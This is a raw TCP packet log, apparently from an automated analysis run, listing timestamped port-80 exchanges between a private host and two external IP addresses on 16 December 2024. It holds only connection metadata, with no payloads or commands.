Dec 16, 2024 11:03:33.084254026 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.084270954 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.084286928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.084319115 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.084876060 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.084933043 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.084940910 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.084964991 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.084985018 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.085007906 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.085299969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.085355997 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.085355997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.085395098 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.085412979 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.085443974 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.085464001 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.085520983 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.086168051 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.086224079 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.086246014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.086283922 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.086302042 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.086321115 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.086335897 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.086374044 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.086889029 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.086949110 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.086950064 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.086985111 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.087002039 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.087021112 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.087033987 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.087068081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.087771893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.087810040 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.087838888 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.087845087 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.087867022 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.087882042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.087897062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.087970972 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.088454008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.088504076 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.088510990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.088546038 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.088567019 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.088583946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.088596106 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.088634014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.089315891 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.089370966 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.089375973 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.089406967 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.089433908 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.089456081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.089476109 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.089528084 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.090059042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.090116978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.090122938 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.090152979 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.090167046 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.090189934 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.090202093 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.090246916 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.090933084 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.090987921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.090992928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.091023922 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.091042042 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.091061115 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.091074944 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.091108084 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.091635942 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.091691017 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.091691971 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.091728926 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.091747999 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.091767073 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.091775894 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.091821909 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.092458010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.092513084 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.092516899 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.092550993 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.092586040 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.092607975 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.092657089 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.093216896 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.093274117 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.093276024 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.093312025 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.093324900 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.093348026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.093358994 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.093403101 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.094058990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.094094038 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.094116926 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.094130039 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.094144106 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.094167948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.094182968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.094213963 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.094810963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.094867945 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.094867945 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.094922066 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.094938993 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.094974041 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.094991922 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.095041990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.095613956 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.095670938 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.095680952 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.095710039 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.095721006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.095748901 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.095762014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.095827103 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.096437931 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.096494913 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.096496105 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.096530914 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.096544027 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.096568108 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.096579075 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.096620083 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.097198963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.097251892 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.097263098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.097286940 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.097312927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.097323895 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.097338915 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.097376108 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.098010063 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.098046064 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.098073006 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.098081112 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.098105907 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.098119020 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.098124981 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.098170042 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.098850012 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.098886013 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.098918915 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.098921061 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.098939896 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.098957062 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.098973989 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.099006891 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.099709988 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.099746943 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.099769115 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.099783897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.099818945 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.099973917 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.099973917 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.099973917 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.100359917 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.100416899 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.100425959 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.100451946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.100465059 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.100502014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.100519896 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.100583076 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.101164103 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.101219893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.101222038 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.101257086 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.101270914 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.101295948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.101309061 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.101345062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.101962090 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.102022886 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.102025986 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.102061987 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.102085114 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.102132082 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.102149010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.102205992 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.102885962 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.102941990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.102942944 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.102978945 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.102992058 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.103014946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.103029013 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.103066921 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.103631020 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.103666067 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.103696108 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.103701115 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.103722095 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.103751898 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.161679029 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.161761045 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.162427902 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.162497044 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.163005114 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.163034916 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.163069963 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.163389921 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.163419008 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.163449049 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.163474083 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.163547039 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.163577080 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.163606882 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.163635015 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.163666010 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.163701057 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.163731098 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.163758039 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.163830042 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.163882017 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.163893938 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.163939953 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.164017916 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.164071083 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.164076090 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.164132118 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.164184093 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.164216995 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.164235115 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.164271116 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.164302111 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.164352894 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.164362907 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.164412022 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.164566040 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.164594889 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.164623022 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.164649963 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.164673090 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.164700985 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.164725065 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.164756060 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.164784908 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.164834976 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.164840937 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.164891958 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.164948940 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.164997101 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.165007114 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.165054083 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.165106058 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.165158987 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.165162086 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.165209055 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.165251970 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.165313005 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.165318966 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.165354013 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.165374994 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.165385008 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.165409088 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.165432930 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.165581942 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.165610075 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.165637016 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.165664911 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.165729046 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.165757895 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.165783882 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.165811062 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.165811062 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.165843010 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.165864944 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.165895939 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.275505066 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.275569916 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.275592089 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.275609016 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.275654078 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.275760889 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.275760889 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.275868893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.275921106 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.275929928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.275976896 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.275978088 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.276027918 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.276448011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.276506901 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.276524067 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.276559114 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.276576042 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.276607990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.276627064 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.276679993 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.277144909 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.277199030 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.277206898 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.277234077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.277256966 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.277283907 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.277303934 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.277359009 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.277986050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.278040886 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.278047085 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.278078079 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.278089046 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.278124094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.278129101 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.278177977 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.278717995 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.278774023 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.278779030 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.278810978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.278825045 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.278847933 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.278868914 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.278898001 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.279623032 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.279680967 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.279728889 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.279766083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.279786110 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.279819965 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.279865980 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.279923916 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.280461073 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.280513048 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.280524969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.280560970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.280577898 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.280596972 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.280610085 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.280646086 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.281315088 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.281368017 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.281374931 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.281404018 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.281409979 CET	49833	80	192.168.2.5	31.41.244.11
